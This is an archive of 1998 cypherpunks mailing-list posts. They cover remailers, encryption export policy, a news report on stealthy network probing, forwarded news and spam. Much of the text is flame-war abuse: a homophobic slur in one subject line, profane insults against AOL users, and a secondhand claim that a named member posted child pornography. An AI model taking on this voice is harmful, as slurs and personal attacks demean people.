Content-Type: text/plain



>Vladimir Z. Nuri wrote:
>
>> ... The statement says that the IRS mission is to 
>> "provide America's taxpayers top quality service by helping them 
>> understand and meet their tax responsibilities and by applying the 
>> tax law with integrity and fairness to all." 

Cool.  So they'll help me make sure my taxes aren't used irresponsibly, 
and make sure they aren't given to murderers or terrorists, 
or prosecutors and cops attacking people for drug use,
or bureaucrats interfering with legitimate businesses
or distributing stolen money?  
Is this mission statement enforceable, or just hype?   :-)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 26 Sep 1998 15:40:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809262036.WAA18977@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Navy fights new hack method

http://www.abcnews.com/sections/tech/CNET/cnet_navyhack980925.html

Tim Clark
CNET NEWS.COM
Hackers are banding together across the globe to mount low-visibility
attacks in an effort to sneak under the radar of security specialists and
intrusion detection software, a U.S. Navy network security team said today. 

Coordinated attacks from up to 15 different locations on several continents
have been detected, and Navy experts believe that the attackers garner
information by probing Navy Web sites and then share it among themselves. 

"These new patterns are really hard to decipher--you need expert forensics
to get the smoking gun," said Stephen Northcutt, head of the Shadow
intrusion detection team at the Naval Surface Warfare Center. "To know
what's really happening will require law enforcement to get hold of the
hackers' code so we can disassemble it." 

The new method involves sending as few as two suspicious probes per hour to
a host computer, a level of interest that usually won't be detected by
standard countermeasures. But by pooling information learned from those
probes, hackers can garner considerable knowledge about a site. 

Northcutt said the new technique for attacks was discovered only this month
and has been detected at Defense Department facilities as well as in
private sector sites, including some outside the United States. 

The Shadow group has posted descriptions of the attacks and
countermeasures, and the information has been forwarded to CERT, which
investigates security attacks. 

"Most intrusion detection systems have a threshold, a radar. These attacks
are intentionally sliding under that threshold so normal intrusion
detection tools will not detect them," said Tim Aldrich, principal analyst
at the Navy facility. 

The Shadow team said that although the new method is harder to detect, it
should not affect sites that are well-secured. But the technique puts sites
with weak security at greater risk. 

The attacks do not involve a new hacker tool or new kind of attack, but
rather represent a low-visibility technique for perpetrating attacks. For
example, one coordinated attack that involved at least 14 locations simply
probed a Web site for security weaknesses without mounting a break-in. 

The Shadow Intrusion Detection team said it cannot determine how many
people might be involved in the attacks--hackers frequently use many
different machines to launch their attacks. But the number of individuals
involved is less important than the technique itself, Northcutt said. 

The technique could be used to scan or mount attacks from more than 100
Internet addresses. The security experts also suggested that makers of
commercial intrusion detection software need to counter the new method. 

"This stealthy probing enables large amounts of parallel firepower, which
means many attack attempts [from many sites] over a short time frame," said
a note distributed by the System Administration Networking and Security
(SANS) Institute. 

Going public with a news of new hacker techniques is somewhat unusual in
the secretive network security community, which often fears that
publicizing attacks before countermeasures are known will tip off attackers
to vulnerabilities. 

"We went public in hopes of raising awareness," Northcutt said. "You're
only going to be able to find stealthy stuff by looking for stealthy stuff." 

But before publicizing the new hacker technique, he added, the Shadow team
had checked to be certain it would not jeopardize any official actions
against the attackers. He also thinks that users of the attack may be caught. 

"If they're working together, it ought to be easier to track them down
because they leave more of a trail," he said. 








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Sun, 27 Sep 1998 01:17:05 +0800
To: CSapronett@aol.com
Subject: Re: faggots
In-Reply-To: <e3e77ed.360d44f2@aol.com>
Message-ID: <3.0.5.32.19980926231001.03ae8a90@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 03:48 PM 9/26/98 EDT, CSapronett@aol.com wrote:
>
>My only regret is that I wont get to watch you all burn in hell !!!

"The good Christian should beware of mathematicians and all those who 
make empty prophecies. The danger already exists that mathematicians 
have made a covenant with the devil to darken the spirit and confine 
man in the bonds of Hell." 
St. Augustine
---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sat, 26 Sep 1998 23:04:01 +0800
To: Anonymous <nobody@replay.com>
Subject: Re:
In-Reply-To: <199809270108.DAA19081@replay.com>
Message-ID: <360DE0BD.7BC844AD@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



<<Heavily snipped to allow for those who don't like it otherwise.>>
> 
> Whenever these people troll for flames here they get them one way or
> another. Then it seems Merrill always tries to take the moral high ground
> and show us all his bleeding heart and tell us how we should embrace the
> AOL idiots and cherish them. 

1.  As a matter of fact, I do try to take the moral high ground -- in
all things.  Sorry, it was how I was raised and I do not intend to swith
to seeking the immoral low ground.
2.  I have Never said to embrace and cherish the idiots from AOL.  Just
that some of the actions I have seen are much closer to the immoral low
ground.

> I don't think Merrill ever misses a chance to defend AOL and attack anybody who
> attacks them. 

I do not mean to Defend AOL except from misinformation -- BTW some of
the characteristics attributed to AOL and its software show a great deal
of clueneediness on the part of the "authors" or a need for
reaquaintance with the truth if the folk actually have a clue and
deciuded to spread "other stuff" instead.  OTOH I do try to defend the
innocents be they from AOL or elsewhere from the repercussions of the
spamming scum that (among other things) started the whole sixdegres
episode.

> About a week ago somebody posted a copy or parts of most AOL
> postings which were sent here in the last months. Merrill ignores the part
> about how the posts were classified

I read his classification criteria closely, and read the results of the
classification process.
> and sends back some vague flame accusing
> the author of classing posts he disagreed with as "clueless" then he quotes
> the entire thing back to the list.
> 
Then commented that he had not followed his own criteria.  

> I don't know which is worse. At least the people flaming the AOL wimps are
> funny.

If funny is all you want, may I recommend rec.humor.funny and, in case
you are up on no current events but Clinton, rec.humor.funny.reruns.

And to the brilliant person seeking muff diving pics, gee send a real
address and we'll see what we can do.  (At least he didn't want it for
pre-muff variety.)

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@base.xs4all.nl>
Date: Sat, 26 Sep 1998 17:20:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <ae6d856ae4545f3a192ebcb3aba4ba0e@base.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



CSapronett@aol.com (note: AOL.COM -- LOL!) wrote:
>My only regret is that I wont get to watch you all burn in hell !!!

I see.  Would you mind elaborating?  We are going to burn in hell
because...? We don't use AOL? We like our privacy? We use cryptosystems
that you'll never understand in your life time?  Because we know how
to use (and create) remailers?



**

~*--*~

___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 26 Sep 1998 21:05:29 +0800
To: cryptography@c2.net
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
Message-ID: <f3dfe177606376e1058ac1b679257f6c@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Julian,

1. Minor nit-picks should be off-line, not spammed to 3 lists.
2. Tupographical errors should not be nit-picked.
3. Spell check your grammar flames.

and
4. Do what I say, not what I do.

proff@iq.org wrote:
> 
> > >the legitimate user has, excepting the 'remembered secret'. Or is
> > >there anything wrong with my logic?
> >
> > Yes.  There is something wrong with you logic.
> >
> > Bruce
> > **********************************************************************
> > Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
> 
> There's something wrong with you grammer.
                                   ^^^^^^^
"grammer" indeed!

> 
> Cheers,
> Julian.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@anon.olymp.org>
Date: Sun, 27 Sep 1998 04:22:06 +0800
To: cypherpunks@cyberpass.net
Subject: Why do we need remailers, anyway?
Message-ID: <20463d5af58cdf2759d132cedbdcfa02@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




At 23 Sep 1998 04:27:46 Reeza! wrote:
> anonymouse, 32 bit aohell to boot. you must feel very safe. Yours is hardly
> the type of post that might necessitate the use of a remailer, so it should
> be safe to assume you haven't the courage to stand behind your words, even
> as mild as they are.
> 
> Fuck you too. I suggest you discuss your lack of a spine with the maker.
> See the above for instructions to meet the maker.
> 
> Reeza!

Hello? This is an old topic, but what the heck...

There is a concept cypherpunks have called "Blacknet", which is an
organisation that sells profiles of prospective employees based on
their public comments on the Internet.

This allows employers to filter out undesirables who might or might
not have outgrown their rebellious youth. (You can never be too safe!) 

Now, there are laws making discrimination illegal. But it's hard to *prove*
that an employer based its decision on BlackNet files, isn't it....

The cypherpunk philosophy is to rely on technology to solve the problem, rather
than rely on the government (or anyone else). Cypherpunks write code.

-- an anonymous aol32 user.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 26 Sep 1998 20:12:33 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199809270108.DAA19081@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 27 Sep 1998, Reeza! wrote:

>
> At 12:14 AM 9/27/98 +0200, Anonymous wrote:
> >CSapronett@aol.com (note: AOL.COM -- LOL!) wrote:
> >>My only regret is that I wont get to watch you all burn in hell !!!
> >
> >I see.  Would you mind elaborating?  We are going to burn in hell
> >because...? We don't use AOL? We like our privacy? We use cryptosystems
> >that you'll never understand in your life time?  Because we know how
> >to use (and create) remailers?
>
> Don't bother, it is a troll.
>
> Not a very original, or even interesting one either.

Whenever these people troll for flames here they get them one way or
another. Then it seems Merrill always tries to take the moral high ground 
and show us all his bleeding heart and tell us how we should embrace the 
AOL idiots and cherish them. The AOLers get triple effect that way. I don't 
think Merrill ever misses a chance to defend AOL and attack anybody who 
attacks them. About a week ago somebody posted a copy or parts of most AOL 
postings which were sent here in the last months. Merrill ignores the part 
about how the posts were classified and sends back some vague flame accusing 
the author of classing posts he disagreed with as "clueless" then he quotes 
the entire thing back to the list.

I don't know which is worse. At least the people flaming the AOL wimps are
funny.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: updates@olsen.ch (OANDA Member Service)
Date: Sat, 26 Sep 1998 22:20:58 +0800
To: cypherpunks@einstein.ssz.com
Subject: The Currency Site Member Update
Message-ID: <199809270321.FAA29582@clam.money>
MIME-Version: 1.0
Content-Type: text/plain



Dear OANDA member,

Updates in this edition:

- Enhancement of Historical and Daily Table
- Improved Personalization of the converters
- Multilanguage Support for Historical and
  Interactive Table
- OANDA co-brands Express by Infoseek

***********************************************************
* This is our second edition of the Member Update. In     *
* the past we have received many suggestions for new      *
* products and services. We hope this newsletter helps    *
* keep you updated on the developments and new releases.  *
* If you do not wish to learn about additional services   *
* and news, please click on the following link            *
* mailto:updates@oanda.com?subject=nofurthernews and send *
* the message without adding any text. Our goal is to     *
* fullfil your wishes and deliver the services you need.  *
***********************************************************

---------------------------------------------------------
Fast Enhanced Historical Currency Table
   - http://www.oanda.com/converter/cc_table
Fast Enhanced Interactive Daily Table
   - http://www.oanda.com/converter/cc_quotes

Due to the quickly increasing access to our two new products,
we have adopted the fast cgi approach for both products.
Furthermore the choice of output as HTML, ASCII and CSV 
facilitates the importing of data into spreadsheet solutions.
If you do calculations with multiple currencies, you can
now easily get the necessary rates into your spreadsheet.

---------------------------------------------------------
Improved Personalization of converter services
   Description of manual editing for all converters:
   - http://www.oanda.com/site/personalize.shtml
   Interactive Interface:
   - http://www.oanda.com/converter/classic?do=pref

Taken into consideration all the suggestions we have
received, we now offer many personalization possibilities
for all our converters including the customized versions.
You can now select a personal list of currencies or, if
you prefer, you keep the whole list, but your most needed
currencies always appear on top of the menu. Therefore
you can generate converters personalized to your needs
of currency information.

---------------------------------------------------------
Multilanguage support for the Historical Currency Table
and the Interactive Daily Table:
   German
   - http://www.oanda.com/converter/cc_table?lang=de
   - http://www.oanda.com/converter/cc_quotes?lang=de
   French:
   - http://www.oanda.com/converter/cc_table?lang=fr
   - http://www.oanda.com/converter/cc_quotes?lang=fr
   Italian:
   - http://www.oanda.com/converter/cc_table?lang=it
   - http://www.oanda.com/converter/cc_quotes?lang=it

To serve the needs of our international customers better,
we are constantly expanding our language choices. We have
just recently extended the support of French, Italian
and German to our new products - the Historical Currency
Table and the Interactive Daily Table.

---------------------------------------------------------
OANDA co-brands Express by Infoseek
http://express.infoseek.com/dve/download_express.phtml?dve_id=143

Announced on September 22,Express by Infoseek is a
next-generation desktop search product which brings
multiple search and information sources together in one 
place. With Express you can find, explore, and do anything 
on the Internet faster and easier.  OANDA is among the 
first round co-distributors of this new product, along
with USA Today, DejaNews, PC World, and others.  To 
download the free co-branded Express by Infoseek, just
click on the link above, or click on the Express 
logo at the top left of the OANDA home page.

---------------------------------------------------------

OANDA Statistics Spotlight:

Over 3000 sites are now using a customized version of our
Classic Currency Converter or Cheat Sheet for Travelers. 

----------------------------------------------------------

Thank you for using the OANDA services.


Best regards,

The OANDA team
updates@oanda.com
http://www.oanda.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sun, 27 Sep 1998 00:14:46 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <19980927052400.21818.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



At 23 Sep 1998 04:27:46 Reeza! wrote:
> Well, it seems I have an admirer. A follower, anyway. Quoting things I said
> from two separate posts.

I read all the posts to cypherpunks. Some several times to try to
understand what some blowhard is trying to say.

[Re; Clinton]
> I believe the other issues are relevant. ... clear evidence of malfeasance
> in many, and every area should not be ignored ...

My argument was:
1. You can't seriously be this fired up over perjury (post OJ), can you?
2. there have been several topics discussed on cypherpunks that were more odious.
3. Charge him with his big crimes. Don't "Al Capone" him.

Your belief that Starr is leading up to the real issues is compatible with my
(now belaboured) point. I still don't understand what you're trying to add.

> I'm not building up the bogey man, I'm discussing what I see. What I see,
> on every major and minor newstation, is a disgrace. A documented, public
> record disgrace.

Well, this *is* a pathetic reason. You want Clinton impeached because the
media tells you so.

At 23 Sep 1998 04:31:48 Reeza! wrote:
> > -- an anonymous aol32 user.
>
> You must be proud of that sig.

It's a shit magnet. Works, too!

> I'll bet you weren't on the list when the list of deceased CIC bodyguards,
> friends and associates was posted either.
> <sigh>
> flush out your head, you aol user. there is more going on here than just
> 'fibbing'.

Fine. charge him with the other things!

As far as the "newby" flame, I've seen that corpse lists here twice recently.
Maybe you've dated yourself? I remember a time without Reeza! posts... 

And there's a sig flame in there, trying to get out. A new low for you, Reeza?

> 
> Reeza!

-- an anonymous aol32 user.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sun, 27 Sep 1998 05:03:48 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199809270531.HAA09168@replay.com>
Message-ID: <360E36C5.33C7DFDC@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> Paul H. Merrill wrote:
> 
> > <<Heavily snipped to allow for those who don't like it otherwise.>>
> 
> Yeah, if you quote back over a hundred lines after adding 6, 8, or
> whatever it happened to be.
> 
Comment on this comes later.

> > > About a week ago somebody posted a copy or parts of most AOL
> > > postings which were sent here in the last months. Merrill ignores the part
> > > about how the posts were classified
> >
> > I read his classification criteria closely, and read the results of the
> > classification process.
> > > and sends back some vague flame accusing
> > > the author of classing posts he disagreed with as "clueless" then he quotes
> > > the entire thing back to the list.
> > >
> > Then commented that he had not followed his own criteria.
> 
> And where did he not? A few could be debated. The rest were either written
> so badly that they were incomprehensible, were off-topic, or didn't
> include quoted material in a reply/followup. He also stated that he was
> counting postings which used that '<< >>' scheme as automatically bad,
> which is understandable. Either way, he seemed to be trying to show the
> statistics. Pull one or two postings off of one side and put them on the
> other and the statistics are still pretty bad for AOL.
>
1.  There are lies, damn lies, and statistics. 
2.  So if the quoted material is included it's bad and if it is not
included it's bad. I think I see the general idea.  Use the rules
appropriate for complaining about whoever you want to complain about.
3.  And what I said was along the lines of most were justified, but some
showed his lack of clues.  Merely being incomprehensible to a person
means little if the person is a little clue-shy.  Badly written is a bad
thing.

> > > I don't know which is worse. At least the people flaming the AOL wimps are
> > > funny.
> >
> > If funny is all you want, may I recommend rec.humor.funny and, in case
> > you are up on no current events but Clinton, rec.humor.funny.reruns.
> 
> No, I want a Cypherpunks list which discusses political issues,
> cryptography, and things related to that. Since this is the Cypherpunks
> list, we aren't going to censor on the basis of content or origin point.
>
And the general degradation of our society to the level that taking the
moral ground is something to be ridiculed is not a political issue?
 
> If all you want to do is defend AOL and their ilk, may I recommend
> comp.os.ms-windows.advocacy and alt.aol-sucks.
> 
I'll pass, thanks anyway.

> > And to the brilliant person seeking muff diving pics, gee send a real
> > address and we'll see what we can do.  (At least he didn't want it for
> > pre-muff variety.)
> 
> Muff diving pics? Do we want to know? Serious questions.

That comment was in reference to two private (and anonymous)posts
purporting to be AOL weenies seeking such things.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 27 Sep 1998 00:41:52 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199809270531.HAA09168@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Paul H. Merrill wrote:

> <<Heavily snipped to allow for those who don't like it otherwise.>>

Yeah, if you quote back over a hundred lines after adding 6, 8, or
whatever it happened to be.

> > About a week ago somebody posted a copy or parts of most AOL
> > postings which were sent here in the last months. Merrill ignores the part
> > about how the posts were classified
>
> I read his classification criteria closely, and read the results of the
> classification process.
> > and sends back some vague flame accusing
> > the author of classing posts he disagreed with as "clueless" then he quotes
> > the entire thing back to the list.
> >
> Then commented that he had not followed his own criteria.

And where did he not? A few could be debated. The rest were either written
so badly that they were incomprehensible, were off-topic, or didn't
include quoted material in a reply/followup. He also stated that he was
counting postings which used that '<< >>' scheme as automatically bad,
which is understandable. Either way, he seemed to be trying to show the
statistics. Pull one or two postings off of one side and put them on the
other and the statistics are still pretty bad for AOL.

> > I don't know which is worse. At least the people flaming the AOL wimps are
> > funny.
>
> If funny is all you want, may I recommend rec.humor.funny and, in case
> you are up on no current events but Clinton, rec.humor.funny.reruns.

No, I want a Cypherpunks list which discusses political issues,
cryptography, and things related to that. Since this is the Cypherpunks
list, we aren't going to censor on the basis of content or origin point.

If all you want to do is defend AOL and their ilk, may I recommend
comp.os.ms-windows.advocacy and alt.aol-sucks.

> And to the brilliant person seeking muff diving pics, gee send a real
> address and we'll see what we can do.  (At least he didn't want it for
> pre-muff variety.)

Muff diving pics? Do we want to know? Serious questions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 27 Sep 1998 10:08:34 +0800
To: cypherpunks@cyberpass.net
Subject: Boxer and Fong on encryption
Message-ID: <360E557D.E8C49F00@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



For California types: Barbara Boxer and Matt Fong responding to questions
in today's SJMC news:

  HI-TECH ISSUES

  1. Did the administration's July 7 decision to let software
  companies export encryption software to financial institutions in
  certain counties go far enough toward relaxing the rules on
  encryption exports? Why/why not?

  BOXER: I am a cosponsor of Senator Burns' Pro-CODE legislation,
  which prohibits the Secretary of Commerce from putting any restrictions
  on the export of encrypted items -- regardless of bit or key length. The
  administration's proposal did not go far enough at all.

  FONG: The administration's new policy simply does not go far enough.
  The administration is rightfully worried about national security, but the
  Genie is out of the bottle. While Clinton has stuck to his restrictive
export
  policy on encryption software, foreign encryption products have become
  more sophisticated and more price competitive. US companies should be
  allowed to export encryption software if similar products are already
  available by foreign competitors.

We'd see more contrast with Feinstein's answer.  Too bad <she's> not
running in this race.

-- 
	Jim Gillogly
	Mersday, 6 Winterfilth S.R. 1998, 15:05
	12.19.5.9.19, 3 Cauac 12 Chen, First Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 26 Sep 1998 18:54:17 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <ae6d856ae4545f3a192ebcb3aba4ba0e@base.xs4all.nl>
Message-ID: <3.0.5.32.19980927094943.00832610@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 12:14 AM 9/27/98 +0200, Anonymous wrote:
>CSapronett@aol.com (note: AOL.COM -- LOL!) wrote:
>>My only regret is that I wont get to watch you all burn in hell !!!
>
>I see.  Would you mind elaborating?  We are going to burn in hell
>because...? We don't use AOL? We like our privacy? We use cryptosystems
>that you'll never understand in your life time?  Because we know how
>to use (and create) remailers?

Don't bother, it is a troll.

Not a very original, or even interesting one either.

Reeza!

"...The world was on fire, but no one could save me but you...
	Strange what desire will make foolish people do...
		(and the background vocalists sang)
			This world is only gonna break your heart...."

					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 27 Sep 1998 11:47:16 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Test [no reply] (should be last one)
Message-ID: <199809271649.LAA04020@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test [no reply]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 27 Sep 1998 12:25:58 +0800
To: cypherpunks@cyberpass.net
Subject: IP: US Says Bomb Suspect Had Nuclear Ambitions
Message-ID: <v04011703b2342542e3f6@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sun, 27 Sep 1998 11:03:36 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: US Says Bomb Suspect Had Nuclear Ambitions
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Chicago Tribune
http://chicagotribune.com/news/nationworld/article/0,1051,SAV-9809270407,00.
html

U.S. SAYS BOMB SUSPECT HAD NUCLEAR AMBITIONS

 From Tribune News Services
 September 27, 1998

 AFRICA -- American authorities have
 charged that a person described as a senior
 deputy to Osama bin Laden, the Saudi exile
 suspected in last month's bombings of two
 U.S. Embassies in East Africa, made
 significant efforts on behalf of the bin Laden
 group in 1993 to develop nuclear weapons.

 The authorities said that, in at least one
 case, there was evidence of documents
 relating to a proposed purchase of enriched
 uranium, but they did not say whether the
 group obtained uranium.

 The allegations, concerning Mamdouh
 Mahmud Salim, also assert that bin Laden
 had an official agreement with the Iranian
 government and with Sudan's ruling party to
 oppose the United States.

 They also suggest that the U.S. had
 penetrated the bin Laden organization and
 learned detailed information in 1996.

 The allegations were contained in newly
 unsealed court papers that charged Salim
 with conspiracy to murder and to use
 weapons of mass destruction against
 Americans overseas, including those in
 Saudi Arabia, Yemen and Somalia.

 Salim was arrested in Germany a week ago
 after flying there from Sudan. The U.S. said
 Friday it will seek his extradition to face
 charges in New York City.

 The government also asserted for the first
 time in court papers that the Iranian
 government had entered into a formal
 three-way "working agreement" with bin
 Laden and the National Islamic Front of the
 Sudan to "work together against the United
 States, Israel and the West." The front is the
 ruling party in Sudan.

 The Aug. 7 bombings of the U.S.
 Embassies in Kenya and Tanzania killed
 more than 250 people.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "BigStar.com" <affiliates@bigstar.com>
Date: Sun, 27 Sep 1998 13:19:03 +0800
To: Cypherpunks@toad.com
Subject: Website owner/administrator
Message-ID: <199809271715.NAA21710@waterfence.bigstar.com>
MIME-Version: 1.0
Content-Type: text/plain



Join the BigStar Network!

If you don't already have an e-commerce plan, BigStar.com can put you in
the game now!  You're probably already familiar with affiliate programs like
Amazon.com and Barnes and Noble.

BigStar is an online VIDEO superstore offering web sites like yours the
opportunity to become affiliates and earn commissions of 8% (or more) on sales
generated by your site - this is your chance to make online e-commerce work
for you!

This is a completely COST-FREE opportunity.  For more information or to
sign up, go to http://www.bigstar.com/aff/index.ff?banid=1060

Big Movies, Big Selection, Big Deals, Big Fun!

=========================================
BigStar is a responsible Direct Marketer and adheres
strictly to industry-established e-mail guidelines.
To unsubscribe from our list, just reply to this
message with the word "remove" in the subject line
to the above address
=========================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sun, 27 Sep 1998 13:36:51 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <bef845b0ecca21ff8860c404f6d17a10@anonymous>
Message-ID: <360EAEAA.DC9178BA@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous lo14 wrote:
> 
> Paul H. Merrill wrote:
> 
> >1.  There are lies, damn lies, and statistics.
> 
> Nice cliche. Unfortunately, it doesn't say anything at all.
> 
More formally, numbers and subtext that sound like statistical
terminology but do not follow proper statistical procedures concerning
sampling of the population and non-biased criteria can be formulated to
say whatever one wshed to be said.  The "statistics" in this case are of
that nature.  (That is the techie translation of the quote given above.)

> >2.  So if the quoted material is included it's bad and if it is not
> >included it's bad. I think I see the general idea.  Use the rules
> >appropriate for complaining about whoever you want to complain about.
> 
> You got it half right. If quoted material is included, it's good. If no
> quoted material is included, it's bad. If quoted material is included but it
> uses the '<< >>' style, it's bad. If a few hundred lines are quoted and six
> added, it's bad. This was explained to you twice; once in the post you're
> responding to, and once in that posting with the AOL quotes. You're
> conveniently ignoring that and you're playing dumb with regard to network
> etiquette. Maybe you aren't just pretending.
> 
Precisely what part of the "statistician's" garbage Should Have Been
Included?  It held no structure to be subdivided, nor did it have
immensely valuable protions to be directly commented upon.  In point of
fact, the total quote methodology was used in "protest" of his
classifying non-quotes as clueless.  The appropriate proportion to be
quoted is a matter of taste and understandability.

> AOL users originally didn't quote at all, they claimed because of software
> constraints. AOL users complained and used the fact that their ISP was lame
> as an excuse for not getting another one. Other net users complained. AOL
> responded by using the '<< >>' quoting style, which was effectively giving
> the rest of the net the bird.
> 
In actuallity, AOL EMail allows for either quoting style to be used.

> If AOL didn't cater to every moron out there, and if AOL didn't keep running
> stupid ads with claims like "AOL is the Internet!", and if AOL wasn't
> sending things like requests for Real Player all over the net, and if AOL
> didn't do things to deliberately piss everyone else off, they'd have a much
> better reputation. Maybe the first two can be written off as simple
> marketting, and maybe the third can be written off as the results of that
> marketting, but there is no excuse for the fourth. All four of those are
> what gets AOL flamed, kill filed, ignored, insulted, and shunned.
> 
And I suppose that it would be appropriate for me to take out my feeling
for everyting that anyone running or using an anonymous remailer does on
anyone who uses, runs, or support anonymous remailers?

> >3.  And what I said was along the lines of most were justified, but some
> >showed his lack of clues.  Merely being incomprehensible to a person
> >means little if the person is a little clue-shy.  Badly written is a bad
> >thing.
> 
> There were one or two which may have been questionable. The rest of them
> fell into his criteria quite well. That's unless you want to claim that
> requests for stickers, CDs, and the rest actually express some subtle
> political point other than to say "I'm a moron." I ensure you, if "We're
> morons" was the point the AOL posters in question were trying to make, their
> message came through quite well. Maybe "you got it?" was actually a secret
> code.
> 
I repeat:And what I said was along the lines of most were justified, but
some
         showed his lack of clues.
We both said the same thing, except you said questionable and I said
showed lack of clues.

> >> > > I don't know which is worse. At least the people flaming the AOL wimps are
> >> > > funny.
> >> >
> >> > If funny is all you want, may I recommend rec.humor.funny and, in case
> >> > you are up on no current events but Clinton, rec.humor.funny.reruns.
> >>
> >> No, I want a Cypherpunks list which discusses political issues,
> >> cryptography, and things related to that. Since this is the Cypherpunks
> >> list, we aren't going to censor on the basis of content or origin point.
> >>
> >And the general degradation of our society to the level that taking the
> >moral ground is something to be ridiculed is not a political issue?
> 
> I was refering to the spam from AOL, Sixdegrees, the "child molestor"
> spammers, and their like. The responses to that, including your's, are
> political speech like you describe. What you're being ridiculed for is,
> almost without fail, defending every AOL weenie and spam site which comes
> onto this list.
> 
I have never defended a spam site to my knowledge.  sixdegrees was not
spam.  It was a requested service.  It's just that the requester was not
authorized to make the request.  My commentary amounted to attack the
offending party, not the other offended parties.

> The child molestor spammers may be able to claim that it isn't their fault
> because they're using lame software, but if they use swiss cheese they
> shouldn't be surprised when the holes are exploited. I'm not saying it's
> very ethical to exploit them, but it isn't surprising.
> 
Actually, the baby porn I referred to was purportedly posted by Timothy
C May.

> Paul, with regard to the rest of this, it's obvious that you're either
